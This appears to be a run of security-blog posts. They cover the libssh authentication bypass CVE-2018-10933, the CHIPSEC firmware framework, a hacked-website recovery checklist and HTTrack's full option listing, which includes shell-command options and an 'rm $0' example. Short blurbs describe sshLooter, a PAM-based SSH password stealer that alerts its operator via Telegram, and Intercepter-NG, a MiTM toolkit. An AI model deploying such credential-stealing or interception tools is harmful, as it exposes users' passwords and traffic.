A fairly serious 4-year old libssh bug has left servers vulnerable to remote compromise, fortunately, the attack surface isn’t that big as neither OpenSSH or the GitHub implementation are affected.
The bug is in the not so widely used libSSH library, not to be confused with libssh2 or OpenSSH – which are very widely used.
There’s a four-year-old bug in the Secure Shell implementation known as libssh that makes it trivial for just about anyone to gain unfettered administrative control of a vulnerable server. While the authentication-bypass flaw represents a major security hole that should be patched immediately, it wasn’t immediately clear what sites or devices were vulnerable since neither the widely used OpenSSH nor Github’s implementation of libssh was affected.
The vulnerability, which was introduced in libssh version 0.6 released in 2014, makes it possible to log in by presenting a server with a SSH2_MSG_USERAUTH_SUCCESS message rather than the SSH2_MSG_USERAUTH_REQUEST message the server was expecting, according to an advisory published Tuesday.
The issue is to do with the fact the libssh server uses the same state machine to authenticate both clients and servers, the message dispatching code processes these requests with the same function and it doesn’t very which mode it’s running in.
This libssh bug is a case of clever exploration and understanding how a protocol works rather than fuzzing or brute-forcing to find a pretty serious vulnerability.
On the brighter side, there were no immediate signs of any big-name sites being bitten by the bug, which is indexed as CVE-2018-10933. While Github uses libssh, the site officials said on Twitter that “GitHub.com and GitHub Enterprise are unaffected by CVE-2018-10933 due to how we use the library.” In a follow-up tweet, GitHub security officials said they use a customized version of libssh that implements an authentication mechanism separate from the one provided by the library. Out of an abundance of caution, GitHub has installed a patch released with Tuesday’s advisory.
Another limitation: only vulnerable versions of libssh running in server mode are vulnerable, while the client mode is unaffected. Peter Winter-Smith, a researcher at security firm NCC who discovered the bug and privately reported it to libssh developers, told Ars the vulnerability is the result of libssh using the same machine state to authenticate clients and servers. Because exploits involve behavior that’s safe in the client but unsafe in the server context, only servers are affected.
A search on Shodan for this libssh bug shows about 6300+ sites using libssh, which isn’t exhaustive and also just the existence of libssh (like the GitHub implenmentation) doesn’t make it vulnerable.
It’s already fixed in the latest releases – libssh 0.8.4 and 0.7.6 – so go update your servers accordingly.
Source: Ars Technica
CHIPSEC is a platform security assessment framework for PCs including hardware, system firmware (BIOS/UEFI), and platform components for firmware hacking.
It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities. It can be run on Windows, Linux, Mac OS X and UEFI shell.
You can use CHIPSEC to find vulnerabilities in firmware, hypervisors and hardware configuration, explore low-level system assets and even detect firmware implants.
What does CHIPSEC Platform Security Assessment Framework Do?
CHIPSEC has a bunch of modules focusing on areas such as Secure Boot, System Management Mode (SMM/SMRAM), BIOS and Firmware security, BIOS write protection etc.
Modules such as:
– SMRAM Locking
– BIOS Keyboard Buffer Sanitization
– SMRR Configuration
– BIOS Protection
– SPI Controller Locking
– BIOS Interface Locking
– Access Control for Secure Boot Keys
– Access Control for Secure Boot Variables
CHIPSEC Firmware Hacking Warnings
1. CHIPSEC kernel drivers provide direct access to hardware resources to user-mode applications (for example, access to physical memory). When installed on production systems this could allow malware to access privileged hardware resources.
2. The driver is distributed as source code. In order to load it on Operating System which requires kernel drivers to be signed (for example, 64-bit versions of Microsoft Windows 7 and higher), it is necessary to enable TestSigning (or equivalent) mode and sign the driver executable with test signature. Enabling TestSigning (or equivalent) mode turns off an important OS kernel protection and should not be done on production systems.
3. Due to the nature of access to hardware, if any CHIPSEC module issues incorrect access to hardware resources, Operating System can hang or panic.
You can download CHIPSEC here:
Or read more here.
The array of easily available Hacking Tools out there now is astounding, combined with self-propagating malware, people often come to me when their website got hacked and they don’t know what to do, or even where to start.
Acunetix has come out with a very useful post with a checklist of actions to take and items to prepare to help you triage and react in the event of a compromise on one of your servers or websites.
When addressing such an event, it can be helpful to have a short checklist of tasks to perform in your recovery process. Doing the right things in the right order will be key to maximise your chances of successful and complete recovery, as well as mitigation of future events.
– Preparation tasks – These make NO CHANGES to your website or any related or underlying components at all.
– Action tasks – Things you need to do, with the obvious initial focus being blocking further access to any malicious actors.
Website Got Hacked Checklist
The list looks like this to deal with when your website got hacked:
- PREPARE: Reaction plan
- PREPARE: Battle sheet
- ACTION: Take your system offline
- PREPARE: Clone your system to a testbed or staging server
- PREPARE: Scan your website for vulnerabilities; identify/confirm intrusion point
- ACTION: Fix the vulnerability
- ACTION: Bring the fixed version of the site back online with a clean OS/Web Server
- PREPARE: Monitor your new and improved website
- PREPARE: Make a Reaction Plan for FUTURE events.
The guide has a combination of basic forensics, proactive prevention moving forwards and general good sense when dealing with a compromise in terms of best practice.
Read the full post with details here:
HTTrack is a free and easy-to-use offline browser utility which acts as a website downloader and a site ripper for copying websites and downloading them for offline viewing.
HTTrack Website Downloader & Site Ripper
HTTrack allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting all the HTML, images, and other files from the server to your computer.
HTTrack arranges the original site’s relative link-structure, which allows you to simply open a page of the “mirrored” website in your browser, and you can browse the site from link to link as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads.
HTTrack is fully configurable and has an integrated help system.
WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release.
HTTrack Download Website For Offline Usage
It has EXTENSIVE options as below:
HTTrack version 3.03BETAo4 (compiled Jul 1 2001)
usage: ./httrack ] [-]
with options listed below: (* is the default value)
O path for mirror/logfiles+cache (-O path_mirror[,path_cache_and_logfiles]) (--path )
%O top path if no path defined (-O path_mirror[,path_cache_and_logfiles])
w *mirror web sites (--mirror)
W mirror web sites, semi-automatic (asks questions) (--mirror-wizard)
g just get files (saved in the current directory) (--get-files)
i continue an interrupted mirror using the cache
Y mirror ALL links located in the first level pages (mirror links) (--mirrorlinks)
P proxy use (-P proxy:port or -P user:pass@proxy:port) (--proxy )
%f *use proxy for ftp (f0 don't use) (--httpproxy-ftp[=N])
rN set the mirror depth to N (* r9999) (--depth[=N])
%eN set the external links depth to N (* %e0) (--ext-depth[=N])
mN maximum file length for a non-html file (--max-files[=N])
mN,N' for non html (N) and html (N')
MN maximum overall size that can be uploaded/scanned (--max-size[=N])
EN maximum mirror time in seconds (60=1 minute, 3600=1 hour) (--max-time[=N])
AN maximum transfer rate in bytes/seconds (1000=1kb/s max) (--max-rate[=N])
%cN maximum number of connections/seconds (*%c10)
GN pause transfer if N bytes reached, and wait until lock file is deleted (--max-pause[=N])
cN number of multiple connections (*c8) (--sockets[=N])
TN timeout, number of seconds after a non-responding link is shutdown (--timeout)
RN number of retries, in case of timeout or non-fatal errors (*R1) (--retries[=N])
JN traffic jam control, minimum transfert rate (bytes/seconds) tolerated for a link (--min-rate[=N])
HN host is abandonned if: 0=never, 1=timeout, 2=slow, 3=timeout or slow (--host-control[=N])
n get non-html files 'near' an html file (ex: an image located outside) (--near)
t test all URLs (even forbidden ones) (--test)
NN structure type (0 *original structure, 1+: see below) (--structure[=N])
or user defined structure (-N "%h%p/%n%q.%t")
LN long names (L1 *long names / L0 8-3 conversion) (--long-names[=N])
KN keep original links (e.g. http://www.adr/link) (K0 *relative link, K absolute links, K3 absolute URI links) (--keep-links[=N])
x replace external html links by error pages (--replace-external)
%x do not include any password for external password protected websites (%x0 include) (--no-passwords)
%q *include query string for local files (useless, for information purpose only) (%q0 don't include) (--include-query-string)
o *generate output html file in case of error (404..) (o0 don't generate) (--generate-errors)
X *purge old files after update (X0 keep delete) (--purge-old[=N])
bN accept cookies in cookies.txt (0=do not accept,* 1=accept) (--cookies[=N])
u check document type if unknown (cgi,asp..) (u0 don't check, * u1 check but /, u2 check always) (--check-type[=N])
j *parse Java Classes (j0 don't parse) (--parse-java[=N])
sN follow robots.txt and meta robots tags (0=never,1=sometimes,* 2=always) (--robots[=N])
%h force HTTP/1.0 requests (reduce update features, only for old servers or proxies) (--http-10)
%B tolerant requests (accept bogus responses on some servers, but not standard!) (--tolerant)
%s update hacks: various hacks to limit re-transfers when updating (identical size, bogus response..) (--updatehack)
%A assume that a type (cgi,asp..) is always linked with a mime type (-%A php3=text/html) (--assume )
F user-agent field (-F "user-agent name") (--user-agent )
%F footer string in Html code (-%F "Mirrored [from host %s [file %s [at %s]]]" (--footer )
%l preffered language (-%l "fr, en, jp, *" (--language )
Log, index, cache
C create/use a cache for updates and retries (C0 no cache,C1 cache is prioritary,* C2 test update before) (--cache[=N])
k store all files in cache (not useful if files on disk) (--store-all-in-cache)
%n do not re-download locally erased files (--do-not-recatch)
%v display on screen filenames downloaded (in realtime) (--display)
Q no log - quiet mode (--do-not-log)
q no questions - quiet mode (--quiet)
z log - extra infos (--extra-log)
Z log - debug (--debug-log)
v log on screen (--verbose)
f *log in files (--file-log)
f2 one single log file (--single-log)
I *make an index (I0 don't make) (--index)
%I make an searchable index for this mirror (* %I0 don't make) (--search-index)
pN priority mode: (* p3) (--priority[=N])
0 just scan, don't save anything (for checking links)
1 save only html files
2 save only non html files
*3 save all files
7 get html files before, then treat other files
S stay on the same directory
D *can only go down into subdirs
U can only go to upper directories
B can both go up&down into the directory structure
a *stay on the same address
d stay on the same principal domain
l stay on the same TLD (eg: .com)
e go everywhere on the web
%H debug HTTP headers in logfile (--debug-headers)
Guru options: (do NOT use)
#0 Filter test (-#0 '*.gif' 'www.bar.com/foo.gif')
#f Always flush log files
#FN Maximum number of filters
#h Version info
#K Scan stdin (debug)
#L Maximum number of links (-#L1000000)
#p Display ugly progress information
#P Catch URL
#R Old FTP routines (debug)
#T Generate transfer ops. log every minutes
#u Wait time
#Z Generate transfer rate statictics every minutes
#! Execute a shell command (-#! "echo hello")
Command-line specific options:
V execute system command after each files ($0 is the filename: -V "rm \$0") (--userdef-cmd )
%U run the engine with another id when called as root (-%U smith) (--user )
Details: Option N
N0 Site-structure (default)
N1 HTML in web/, images/other files in web/images/
N2 HTML in web/HTML, images/other in web/images
N3 HTML in web/, images/other in web/
N4 HTML in web/, images/other in web/xxx, where xxx is the file extension
(all gif will be placed onto web/gif, for example)
N5 Images/other in web/xxx and HTML in web/HTML
N99 All files in web/, with random names (gadget !)
N100 Site-structure, without www.domain.xxx/
N101 Identical to N1 exept that "web" is replaced by the site's name
N102 Identical to N2 exept that "web" is replaced by the site's name
N103 Identical to N3 exept that "web" is replaced by the site's name
N104 Identical to N4 exept that "web" is replaced by the site's name
N105 Identical to N5 exept that "web" is replaced by the site's name
N199 Identical to N99 exept that "web" is replaced by the site's name
N1001 Identical to N1 exept that there is no "web" directory
N1002 Identical to N2 exept that there is no "web" directory
N1003 Identical to N3 exept that there is no "web" directory (option set for g option)
N1004 Identical to N4 exept that there is no "web" directory
N1005 Identical to N5 exept that there is no "web" directory
N1099 Identical to N99 exept that there is no "web" directory
Details: User-defined option N
%n Name of file without file type (ex: image) (--do-not-recatch)
%N Name of file, including file type (ex: image.gif)
%t File type (ex: gif)
%p Path [without ending /] (ex: /someimages)
%h Host name (ex: www.someweb.com) (--http-10)
%M URL MD5 (128 bits, 32 ascii bytes)
%Q query string MD5 (128 bits, 32 ascii bytes)
%q small query string MD5 (16 bits, 4 ascii bytes) (--include-query-string)
%s? Short name version (ex: %sN)
%[param] param variable in query string
There is a great guide and explanation of all the options to download websites here:
HTTrack Download Website Copier
You can download HTTrack here:
Or read more here.
sshLooter is a Python script using a PAM module to steal SSH passwords by logging the password and notifying the admin of the script via Telegram when a user logs in rather than via strace which is not so reliable. It also comes with an installation script install.sh to install all dependencies on a target […]
Intercepter-NG is a multi functional network toolkit including an Android app for hacking, the main purpose is to recover interesting data from the network stream and perform different kinds of MiTM attacks. Specifically referring to Intercepter-NG Console Edition which works on a range of systems including NT, Linux, BSD, MacOSX, IOS and Android. The Windows […]